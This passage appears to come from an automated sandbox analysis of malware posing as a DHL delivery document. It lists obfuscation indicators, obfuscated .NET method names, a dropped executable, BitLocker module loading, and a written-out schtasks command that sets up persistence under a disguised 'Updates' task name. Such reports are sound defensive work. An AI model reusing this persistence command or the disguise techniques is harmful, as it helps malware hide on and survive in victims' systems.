Source: 19.2.OoIHIwIlaOHZFTFWeSHYCjEJ.exe.280cd08.1.raw.unpack, BufferingPage.cs .Net Code: InitializeComponent
Binary contains a suspicious time stamp
Source: DHL_Delivery Documents.exe Static PE information: 0xDBE1BAC7 [Sun Nov 24 19:15:19 2086 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 0_2_02C147B1 push ebp; ret 0_2_02C14815
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_0041483F push ds; iretd 8_2_00414840
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_00405256 push cs; retf 8_2_0040525E
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_00418BCE push ds; iretd 8_2_00418BCF
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_004063BD push edi; ret 8_2_004063BE
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_00404CD3 push dword ptr [edx+08391132h]; iretd 8_2_00404D17
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_004124FD push eax; ret 8_2_004124FE
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_00403490 push eax; ret 8_2_00403492
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_00404D01 push dword ptr [edx+08391132h]; iretd 8_2_00404D17
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_0041CDFC pushad ; ret 8_2_0041CDF6
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_0041CDBE pushad ; ret 8_2_0041CDF6
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_0040CFCC push esp; ret 8_2_0040CFCD
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01BE225F pushad ; ret 8_2_01BE27F9
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01BE27FA pushad ; ret 8_2_01BE27F9
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01C109AD push ecx; mov dword ptr [esp], ecx 8_2_01C109B6
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01BE283D push eax; iretd 8_2_01BE2858
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: 8_2_01BE1368 push eax; iretd 8_2_01BE1369
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 9_2_04A1F438 push eax; iretd 9_2_04A1F439
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_0162C54F push 8B015B67h; ret 13_2_0162C554
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_0162C54D pushfd ; ret 13_2_0162C54E
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_0162C9D7 push edi; ret 13_2_0162C9D9
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015E09AD push ecx; mov dword ptr [esp], ecx 13_2_015E09B6
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015B1FEC push eax; iretd 13_2_015B1FED
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_01637E99 push ecx; ret 13_2_01637EAC
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Code function: 17_2_02FDEA8F push ds; iretd 17_2_02FDEA90
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Code function: 17_2_02FE924D push DCA6106Ah; iretd 17_2_02FE9254
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Code function: 17_2_02FD721C push esp; ret 17_2_02FD721D
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Code function: 17_2_02FE2A11 push ds; ret 17_2_02FE2A12
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Code function: 17_2_02FE704C pushad ; ret 17_2_02FE7046
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Code function: 17_2_02FE700E pushad ; ret 17_2_02FE7046
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Code function: 17_2_02FE2E1E push ds; iretd 17_2_02FE2E1F
Source: DHL_Delivery Documents.exe Static PE information: section name: .text entropy: 7.036454178640072
Source: YybGLWQSx.exe.0.dr Static PE information: section name: .text entropy: 7.036454178640072
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, AbRlcZD5I4DdphA7Ht.cs High entropy of concatenated method names: 'BT3xmq3GYn', 'sKHxTgGoLu', 'olfxwB7MpT', 'IiGxe6r2jE', 'Lw5xr6bNpq', 'Ml9xBBiKpK', 'NlGx7CtvYM', 'bnmxnnpSCg', 'nkwxE291MO', 'oSbxaW2IWV'
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, SJ926WTpoKiyGmVNYm.cs High entropy of concatenated method names: 'kD9NM3WXem', 'iiDNbAsWSW', 'ICgNm0klnE', 'qiGNTfEBuT', 'vxUNdFrUba', 'TDKNHVhTSk', 'GeTNCra2Sa', 'nnQNGeb0rM', 'jFYNPKp5CX', 'V1pNcks5FO'
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, Y5jh8ihuuv6mXkApNQ.cs High entropy of concatenated method names: 'yna0jYDgZx', 'O020Z02YA0', 'DQ3014KMss', 'KMN0MffN61', 'VZy0vHZTEm', 'B6b0basyXQ', 'h970RLPmuL', 'PoZ0mgXW9c', 'hEB0TK8okK', 'cb70uc4GYN'
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, kxpixr3uPAMKj5Q2Cq.cs High entropy of concatenated method names: 'HW2CXHchXA', 'unmCVpWX90', 'rMDG9PRnGw', 'HWWG6bhwcu', 'SxSCaPjjBf', 'bqdCor2ru2', 'xZZCDI5PA3', 'HF8Cyo0Gkh', 'oi5CkM3nAa', 'a0hCg4UtUa'
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, n6ldLBu5fDp4pNHO3y.cs High entropy of concatenated method names: 'ISY2vxQrCO', 'lVa2RJrTht', 'NSAN5YmlCe', 'fKtNrpTtf0', 'qRsNBFsMul', 'mRnNAP3Vse', 'OCpN7vctPk', 'rkXNn3S16O', 'X4oNhUAH7m', 'r0lNEpbXFf'
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, RU6c2kU9YKG76GBYRe.cs High entropy of concatenated method names: 'bMrSL4bdYS', 'SsnSQ8mBeR', 'L5NS8MwTtg', 'G1WSNn2jrX', 'YkQS2UbQ0v', 'j9eSW6wIAj', 'hpfS0rvfQ5', 'D3LSU6Bd0T', 'qkdSpxNbt5', 'zNUSOWm1DF'
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, GEk4CQV1nkYogPRIP5.cs High entropy of concatenated method names: 'BADP64JYIA', 'H9hPSQUFuR', 'jq9PlICkKx', 'FcBPQWcGO6', 'j5lP8WGPAD', 'I6kP295Ua0', 'uvpPW0TIWe', 'YYiGFfe1wx', 'bUFGX1gsnU', 'AsoGtPFfoi'
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, hPpbPxy7qlsZaQYrUl.cs High entropy of concatenated method names: 'NUOdEmsWwP', 'QZ7do70DJ5', 'wj3dyra6Ic', 'XrWdkLLiDc', 'agIdegtELY', 'woVd54n59C', 'VvhdrIWOM9', 'AwydBsO4OX', 'DcwdAA72pT', 'Krvd72teGR'
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, kdd45aqdIHvmOw72Wh.cs High entropy of concatenated method names: 'vwG1OW6mh', 'jNlMqG6pF', 'EeebXlKQC', 'FBPRDG6Iv', 'hIUTrO6rr', 'hhZuZnBcT', 'xa4LdIIC6IAOLLBeiR', 'N7A8077lpQmG4NLM8T', 'LvwGOeWnO', 'y9Vc8DToi'
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, RxkmdA69PTFuhRfPXeX.cs High entropy of concatenated method names: 'advPjKSrex', 'rMjPZggM78', 'S44P1MHTsT', 'PHgPMxuFOG', 'gMuPvhfsml', 'PpvPbMTrbr', 'iPpPRsOkn5', 'aJcPmnS6fN', 'QGuPTVCRdG', 'aXEPuqKoqQ'
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, SFlTW26StfpklInMEh0.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'I0IcyJY6Ol', 'UYockUYD0t', 'mLqcgC0MOU', 'v9bcfr0uEg', 'TiDcJsOY82', 'cCrc3r9rd6', 'TPdcFcSJBA'
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, jO3Tf3X7vkYNwGYAPE.cs High entropy of concatenated method names: 'JAkGQku8Ku', 'ziQG8v403L', 'xIFGN8UfhC', 'oRTG2qlitJ', 'PCSGWWGWji', 'GNqG06W3Z5', 'wSyGUXfwEe', 'eQyGpA1q1o', 'iVZGOsKRtL', 'ABhGYtx0oH'
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, yjA8AJ8FAEvC4Ibgo1.cs High entropy of concatenated method names: 'Dispose', 'nS16ts6l5t', 'TT8qeruNSO', 'AcWOOMTBrN', 'Y0O6V3Tf37', 'AkY6zNwGYA', 'ProcessDialogKey', 'sEZq97GEca', 'jvLq6ObKcN', 'LxSqqwEk4C'
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, XPVT9YwdK4GfnPIrg7.cs High entropy of concatenated method names: 'hQAWL0kvSP', 'Sd3W8CUqC3', 'AgHW2kw0x0', 'j91W0EoWPk', 'sGSWU3yF1k', 'Wrj2Je1Ftb', 'eqP23FW5Iq', 'tAo2F34GXa', 'aF32XtoCmC', 'Ewu2trLGwg'
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, z7GEcat0vLObKcNnxS.cs High entropy of concatenated method names: 'DCeGwQMc53', 'cpRGeTu8Wm', 'SdPG5lvP1I', 'QOdGrNYvbY', 'r28GylScLZ', 'feiGBmaYKf', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, W3yVFhmE2W66Gxi81U.cs High entropy of concatenated method names: 'ch88ysMWLB', 'TAf8kbr2EC', 'lJr8geZMUs', 'NjP8fPEvxf', 'ecS8JXBuDi', 'eRu830v3hJ', 'KOO8FquaWt', 'mgv8XG0Pqe', 'lC98tCWWRV', 'kP18VxtKk5'
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, AlPV4878XS9e8K3aHI.cs High entropy of concatenated method names: 'Km90Q3RKa5', 'IwD0NYQhwE', 'isX0Wc5hG9', 'jcNWVEPMED', 'XuFWzk15Vj', 'QQi093tlPI', 'XMU06AoWnM', 'rF50qFXpSy', 'Pfl0SjbFuk', 'CA20lcbKcs'
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, nCnGfHzpr4cbYfCxmv.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Nx6PxtEyZU', 'a0OPdQN0Hq', 'Fj9PHm81if', 'Jy2PCsej4w', 'Ad0PGhjdTf', 'E5RPP2Sggj', 'i6ZPcrbrd5'
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, A2h86JlramnZ7u93tE.cs High entropy of concatenated method names: 'OyF603yVFh', 'N2W6U66Gxi', 'ipo6OKiyGm', 'YNY6Ymx6ld', 'gHO6d3ytPV', 'E9Y6HdK4Gf', 'v4Ru7jR2ePxAFprqWn', 'FdSQy9Tn1oP85Qapxr', 'nBC66U8qXp', 'm8J6SaRd08'
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, AbRlcZD5I4DdphA7Ht.cs High entropy of concatenated method names: 'BT3xmq3GYn', 'sKHxTgGoLu', 'olfxwB7MpT', 'IiGxe6r2jE', 'Lw5xr6bNpq', 'Ml9xBBiKpK', 'NlGx7CtvYM', 'bnmxnnpSCg', 'nkwxE291MO', 'oSbxaW2IWV'
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, SJ926WTpoKiyGmVNYm.cs High entropy of concatenated method names: 'kD9NM3WXem', 'iiDNbAsWSW', 'ICgNm0klnE', 'qiGNTfEBuT', 'vxUNdFrUba', 'TDKNHVhTSk', 'GeTNCra2Sa', 'nnQNGeb0rM', 'jFYNPKp5CX', 'V1pNcks5FO'
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, Y5jh8ihuuv6mXkApNQ.cs High entropy of concatenated method names: 'yna0jYDgZx', 'O020Z02YA0', 'DQ3014KMss', 'KMN0MffN61', 'VZy0vHZTEm', 'B6b0basyXQ', 'h970RLPmuL', 'PoZ0mgXW9c', 'hEB0TK8okK', 'cb70uc4GYN'
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, kxpixr3uPAMKj5Q2Cq.cs High entropy of concatenated method names: 'HW2CXHchXA', 'unmCVpWX90', 'rMDG9PRnGw', 'HWWG6bhwcu', 'SxSCaPjjBf', 'bqdCor2ru2', 'xZZCDI5PA3', 'HF8Cyo0Gkh', 'oi5CkM3nAa', 'a0hCg4UtUa'
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, n6ldLBu5fDp4pNHO3y.cs High entropy of concatenated method names: 'ISY2vxQrCO', 'lVa2RJrTht', 'NSAN5YmlCe', 'fKtNrpTtf0', 'qRsNBFsMul', 'mRnNAP3Vse', 'OCpN7vctPk', 'rkXNn3S16O', 'X4oNhUAH7m', 'r0lNEpbXFf'
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, RU6c2kU9YKG76GBYRe.cs High entropy of concatenated method names: 'bMrSL4bdYS', 'SsnSQ8mBeR', 'L5NS8MwTtg', 'G1WSNn2jrX', 'YkQS2UbQ0v', 'j9eSW6wIAj', 'hpfS0rvfQ5', 'D3LSU6Bd0T', 'qkdSpxNbt5', 'zNUSOWm1DF'
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, GEk4CQV1nkYogPRIP5.cs High entropy of concatenated method names: 'BADP64JYIA', 'H9hPSQUFuR', 'jq9PlICkKx', 'FcBPQWcGO6', 'j5lP8WGPAD', 'I6kP295Ua0', 'uvpPW0TIWe', 'YYiGFfe1wx', 'bUFGX1gsnU', 'AsoGtPFfoi'
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, hPpbPxy7qlsZaQYrUl.cs High entropy of concatenated method names: 'NUOdEmsWwP', 'QZ7do70DJ5', 'wj3dyra6Ic', 'XrWdkLLiDc', 'agIdegtELY', 'woVd54n59C', 'VvhdrIWOM9', 'AwydBsO4OX', 'DcwdAA72pT', 'Krvd72teGR'
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, kdd45aqdIHvmOw72Wh.cs High entropy of concatenated method names: 'vwG1OW6mh', 'jNlMqG6pF', 'EeebXlKQC', 'FBPRDG6Iv', 'hIUTrO6rr', 'hhZuZnBcT', 'xa4LdIIC6IAOLLBeiR', 'N7A8077lpQmG4NLM8T', 'LvwGOeWnO', 'y9Vc8DToi'
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, RxkmdA69PTFuhRfPXeX.cs High entropy of concatenated method names: 'advPjKSrex', 'rMjPZggM78', 'S44P1MHTsT', 'PHgPMxuFOG', 'gMuPvhfsml', 'PpvPbMTrbr', 'iPpPRsOkn5', 'aJcPmnS6fN', 'QGuPTVCRdG', 'aXEPuqKoqQ'
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, SFlTW26StfpklInMEh0.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'I0IcyJY6Ol', 'UYockUYD0t', 'mLqcgC0MOU', 'v9bcfr0uEg', 'TiDcJsOY82', 'cCrc3r9rd6', 'TPdcFcSJBA'
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, jO3Tf3X7vkYNwGYAPE.cs High entropy of concatenated method names: 'JAkGQku8Ku', 'ziQG8v403L', 'xIFGN8UfhC', 'oRTG2qlitJ', 'PCSGWWGWji', 'GNqG06W3Z5', 'wSyGUXfwEe', 'eQyGpA1q1o', 'iVZGOsKRtL', 'ABhGYtx0oH'
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, yjA8AJ8FAEvC4Ibgo1.cs High entropy of concatenated method names: 'Dispose', 'nS16ts6l5t', 'TT8qeruNSO', 'AcWOOMTBrN', 'Y0O6V3Tf37', 'AkY6zNwGYA', 'ProcessDialogKey', 'sEZq97GEca', 'jvLq6ObKcN', 'LxSqqwEk4C'
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, XPVT9YwdK4GfnPIrg7.cs High entropy of concatenated method names: 'hQAWL0kvSP', 'Sd3W8CUqC3', 'AgHW2kw0x0', 'j91W0EoWPk', 'sGSWU3yF1k', 'Wrj2Je1Ftb', 'eqP23FW5Iq', 'tAo2F34GXa', 'aF32XtoCmC', 'Ewu2trLGwg'
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, z7GEcat0vLObKcNnxS.cs High entropy of concatenated method names: 'DCeGwQMc53', 'cpRGeTu8Wm', 'SdPG5lvP1I', 'QOdGrNYvbY', 'r28GylScLZ', 'feiGBmaYKf', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, W3yVFhmE2W66Gxi81U.cs High entropy of concatenated method names: 'ch88ysMWLB', 'TAf8kbr2EC', 'lJr8geZMUs', 'NjP8fPEvxf', 'ecS8JXBuDi', 'eRu830v3hJ', 'KOO8FquaWt', 'mgv8XG0Pqe', 'lC98tCWWRV', 'kP18VxtKk5'
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, AlPV4878XS9e8K3aHI.cs High entropy of concatenated method names: 'Km90Q3RKa5', 'IwD0NYQhwE', 'isX0Wc5hG9', 'jcNWVEPMED', 'XuFWzk15Vj', 'QQi093tlPI', 'XMU06AoWnM', 'rF50qFXpSy', 'Pfl0SjbFuk', 'CA20lcbKcs'
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, nCnGfHzpr4cbYfCxmv.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Nx6PxtEyZU', 'a0OPdQN0Hq', 'Fj9PHm81if', 'Jy2PCsej4w', 'Ad0PGhjdTf', 'E5RPP2Sggj', 'i6ZPcrbrd5'
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, A2h86JlramnZ7u93tE.cs High entropy of concatenated method names: 'OyF603yVFh', 'N2W6U66Gxi', 'ipo6OKiyGm', 'YNY6Ymx6ld', 'gHO6d3ytPV', 'E9Y6HdK4Gf', 'v4Ru7jR2ePxAFprqWn', 'FdSQy9Tn1oP85Qapxr', 'nBC66U8qXp', 'm8J6SaRd08'
Drops PE files
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe File created: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp"

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
